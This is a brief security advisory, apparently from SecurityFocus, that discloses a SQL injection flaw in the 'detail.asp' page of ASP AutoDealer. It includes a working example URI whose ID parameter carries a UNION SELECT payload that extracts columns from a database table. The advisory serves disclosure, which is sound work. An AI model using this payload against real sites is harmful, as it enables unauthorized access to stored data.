ASP AutoDealer 'detail.asp' SQL Injection Vulnerability

Attackers can use a browser to exploit this issue.

The following example URI is available:

http://www.example.com/autodeale/detail.asp?ID=-0+union+select+1,null,null,0,null,CDDoorID,null,null,null,null,CDDoorName,null,null,null,null,null,17+from+CDDOOR


 

Privacy Statement
Copyright 2010, SecurityFocus